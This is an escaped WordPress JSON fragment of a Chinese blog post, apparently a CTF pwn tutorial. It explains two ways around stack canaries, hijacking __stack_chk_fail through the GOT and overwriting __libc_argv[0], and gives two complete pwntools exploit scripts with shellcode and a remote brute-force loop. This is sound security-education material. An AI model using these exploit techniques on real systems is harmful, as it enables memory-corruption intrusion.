class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%8A%AB%E6%8C%81_stack_chk_fail%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87canary\"><\/span>\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u539f\u7406\uff1a\u68c0\u6d4b\u5230canary\u88ab\u7be1\u6539\u540e\uff0c\u7a0b\u5e8f\u4f1a\u8c03\u7528___stack_chk_fail\u51fd\u6570\u6765\u9000\u51fa\u7a0b\u5e8f\uff0c\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NNKTODF_GX6LBG5O7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"794\" height=\"365\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NNKTODF_GX6LBG5O7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-520\"  sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u80fd\u7be1\u6539GOT\u8868\u4e2d___stack_chk_fail\u7684\u503c\u4e3a\u76ee\u6807\u51fd\u6570\u7684\u503c\uff0c\u5728\u89e6\u53d1canary\u7be1\u6539\u68c0\u6d4b\u65f6\u5c31\u4f1a\u8c03\u7528\u76ee\u6807\u51fd\u6570\u800c\u4e0d\u662f___stack_chk_fail\u3002<\/p>\n\n\n\n<p>\u4f8b\u9898\uff1a2024\u6e90\u9c81\u676f canary_orw<\/p>\n\n\n\n<p>main\u51fd\u6570\uff0c\u6709\u6c99\u7bb1\uff0c\u7981\u7528\u4e86execve\uff0c\u6709\u6ea2\u51fa\u3002<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1IWJSD4NT@C57M6TYTN@KU.png'><img class=\"lazyload 
lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"911\" height=\"520\" data-id=\"521\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1IWJSD4NT@C57M6TYTN@KU.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-521\"  sizes=\"auto, (max-width: 911px) 100vw, 911px\" \/><\/div><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u51fd\u6570vuln\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/62LK3ZUGPA5D9TGE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"529\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/62LK3ZUGPA5D9TGE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-522\"  sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>gadget\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NEPX@YILCZJIUJEXML.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"451\" height=\"345\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NEPX@YILCZJIUJEXML.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-523\"  sizes=\"auto, (max-width: 451px) 100vw, 451px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>vuln\u7b2c\u4e00\u4e2aread\u53ef\u4ee5\u6ea2\u51fa\u5230v3\uff0c\u4e5f\u5c31\u662f\u53ef\u4ee5\u63a7\u5236\u4e0b\u4e00\u4e2asys_read\u7684\u5199\u5165\u5730\u5740\uff0c\u76f8\u5f53\u4e8e\u80fd\u4efb\u610f\u5730\u5740\u51998\u5b57\u8282\uff0c\u6700\u540e\u8fd8\u6709\u4e00\u4e2a\u8db3\u591f\u957f\u7684\u6ea2\u51fa\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u601d\u8def\u5c31\u662f\uff0c\u5148\u5728main\u51fd\u6570\u4e2d\u6ea2\u51fa\u8986\u76d6ret\u5230vuln\uff0c\u7136\u540e\u7b2c\u4e00\u4e2aread\u7be1\u6539v3\u4e3a___stack_chk_fail\u7684got\u8868\u5730\u5740\uff0c\u4e0b\u4e00\u4e2asys_read\u5f80___stack_chk_fail\u7684got\u8868\u5730\u5740\u5199\u5165ret\u6307\u4ee4\u5730\u5740\u3002\uff08\u8fd9\u6837\u89e6\u53d1canary\u68c0\u6d4b\u65f6\u5019\u5c31\u4f1aret\u56de\u6765\uff09\u3002\u6700\u540e\u4e00\u4e2aread\u5f80\u8986\u76d6\u8fd4\u56de\u5730\u5740\u4e3ajmp 
rsp\uff0c\u7136\u540e\u540e\u9762\u7d27\u8ddf\u4e0ashellcode\u3002<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u6d41\u6267\u884c\u6d41\u7a0b\u662f\uff0c\u5148\u4ecemain\u5230vuln\uff0c\u7136\u540e\u7b2c\u4e00\u4e2aread+\u7b2c\u4e8c\u4e2aread\u628a___stack_chk_fail\u7be1\u6539\u4e3aret\uff0c\u7b2c\u4e09\u4e2aread\u628a\u8fd4\u56de\u5730\u5740\u8986\u76d6\u6210jmp rsp\uff0c\u540e\u9762\u63a5\u4e0ashellcode\uff0c\u540c\u65f6\u89e6\u53d1canary\u7be1\u6539\u68c0\u6d4b\u3002\u7a0b\u5e8f\u8c03\u7528___stack_chk_fail,\u5b9e\u9645\u4e0a\u8c03\u7528\u4e86ret\uff0c\u7ee7\u7eed\u56de\u5230\u539fvuln\u51fd\u6570\uff0c\u7136\u540e\u5c31\u662fleave\uff0c\u6b64\u65f6rsp\u6307\u5411\u8fd4\u56de\u5730\u5740\uff08\u503c\u4e3a jmp rsp\u6307\u4ee4\u7684\u5730\u5740\uff09\uff0c\u63a5\u7740\u6267\u884cret\uff0cpop\u8fd4\u56de\u5730\u5740\u7684\u503c\u7ed9eip\uff0cesp\u5411\u4e0a\u79fb\u52a8\u4e00\u4e2a\u5355\u4f4d\uff0c\u6b63\u597d\u6307\u5411shellcode\uff0c\u7136\u540eeip\u6267\u884c jmp rsp\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u6267\u884cshellcode\u3002<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<p>\u53ef\u4ee5\u53c2\u7167\u56fe\u6765\u770b\uff1a<\/p>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DHNGJDBO@DVV4H52J71.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"798\" height=\"266\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DHNGJDBO@DVV4H52J71.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-524\"  sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/div><\/figure>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext(arch='amd64', os='linux', log_level='debug')\n\nr=process(\"\/home\/monke\/PWN\/CHB\/canary\")\nelf=ELF(\"\/home\/monke\/PWN\/CHB\/canary\")\n\njmp_rsp = 0x40081B\ncheck = elf.got&#91;'__stack_chk_fail']\nmain = elf.sym&#91;'main']\nret=0x4006ae\n\nshellcode = shellcraft.open('.\/flag')\nshellcode += shellcraft.read(3, 0x601060, 0x30)\nshellcode += shellcraft.write(1, 0x601060,0x30)\n\n\nr.sendlineafter(b'journey', p64(elf.sym&#91;'vuln']))\n#gdb.attach(r)\nr.sendafter(b'Sea', b'a' * 0x8 + p64(elf.got&#91;'__stack_chk_fail']))\n#gdb.attach(r)\nr.sendafter(b'magic', p64(ret))\nr.sendafter(b'go',b'a'*40+p64(jmp_rsp)  + asm(shellcode))\n\nr.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SES1JFBEEX86NDAF-1024x455.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"455\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SES1JFBEEX86NDAF-1024x455.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-525\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E8%A6%86%E7%9B%96_libc_argv0\"><\/span> \u8986\u76d6__libc_argv[0]<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u539f\u7406\uff1a\u7531\u4e8ecanary\u68c0\u6d4b\u7be1\u6539\u540e\u4f1a\u8c03\u7528stack_chk_fail\u51fd\u6570\uff0c\u5176\u4e2d\u4e00\u4e2a\u53c2\u6570\u662f\u6587\u4ef6\u540d\uff0c\u5373\u201c__libc_argv[0]\u201d\uff0c\u5c06\u6b64\u8986\u76d6\u5c31\u80fd\u8f93\u51fa\u7279\u5b9a\u5185\u5bb9\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u98981\uff1actfshow pwn117<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDSFN6WXSJGUN9ZRPIO8-1024x643.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"643\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDSFN6WXSJGUN9ZRPIO8-1024x643.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-847\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u903b\u8f91\u975e\u5e38\u7b80\u5355\uff0cdebug\u7b97\u51fagets\u65f6\u5019\u7684\u6808\u5730\u5740\u548c__libc_argv[0]\u8ddd\u79bb\u5373\u53ef\uff0c\u4f46\u6211\u7b97\u4e0d\u5bf9\uff0c\u76f4\u63a5\u7206\u7834\uff1a<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext(arch='amd64', os='linux',log_level='info')\n#io = process('.\/pwn')\n\nflag = 0x6020A0 #buf\n\n\ndef 
pwn(i):\n\tprint(i)\n\tio.recvuntil('Haha,It has reduced you a lot of difficulty!')\n\tpayload = cyclic(i) + p64(flag)\n\tio.sendline(payload)\n\tprint(io.recvall())\n\tio.close()\n\t\nfor i in range(280,1000):\n        io = remote('pwn.challenge.ctf.show',28214)\n        pwn(i)\n        sleep(0.1)\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/N4W5YR47QES0HDNMF_HQN-1024x386.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"386\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/N4W5YR47QES0HDNMF_HQN-1024x386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-848\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u98982\uff1a\u7f51\u9f0e\u676f2018_guess<\/p>\n\n\n\n<p>\u8fd9\u9898flag\u4e0d\u662f\u5b58\u5728bss\u6bb5\u800c\u662f\u5b58\u5728\u6808\u4e0a\uff0c\u6240\u4ee5\u9700\u8981\u8ba1\u7b97flag\u5730\u5740\uff0c\u6240\u5e78\u9898\u76ee\u4f7f\u7528fork\u7ed9\u4e86\u4e09\u6b21\u673a\u4f1a\u3002<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b21fork\u8986\u76d6__libc_argv[0]\u4e3aputs\u7684got\u8868\u5730\u5740\uff0c\u8ba1\u7b97libc\u57fa\u5740\uff0c\u8fdb\u800c\u8ba1\u7b97environ\u5730\u5740\uff08environ\u5b58\u4e86\u6808\u57fa\u5740\uff09<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b21fork\u8986\u76d6__libc_argv[0]\u4e3aenviron\u5730\u5740\uff0c\u6cc4\u9732\u51fa\u6808\u57fa\u5740\uff0c\u8ba1\u7b97flag\u5730\u5740<\/p>\n\n\n\n<p>\u7b2c\u4e09\u6b21fork\u8986\u76d6__libc_argv[0]\u4e3aflag\u5730\u5740\uff0c\u6210\u529f\u6cc4\u9732\u3002<\/p>\n\n\n\n<p>\u8be6\u7ec6\u89c1\uff1a<a href=\"https:\/\/blog.csdn.net\/mcmuyanga\/article\/details\/114789897\">[BUUCTF]PWN\u2014\u2014wdb2018_guess\uff08stack smashing&#8211;canary\u62a5\u9519\u5229\u7528\uff09_buuctf canary-CSDN\u535a\u5ba2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>canary\u4fdd\u62a4\u6982\u8ff0\uff1a Canary &#8211; CTF Wiki \u6211\u4eec\u77e5\u9053\uff0c\u901a\u5e38\u6808\u6ea2\u51fa\u7684\u5229\u7528\u65b9\u5f0f\u662f\u901a\u8fc7\u6ea2 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,17,13],"tags":[14,23],"class_list":["post-465","post","type-post","status-publish","format-standard","hentry","category-22","category-17","category-13","tag-pwn","tag-23"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=465"}],"version-history":[{"count":14,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465\/revisions"}],"predecessor-version":[{"id":850,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465\/revisions\/850"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=465"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}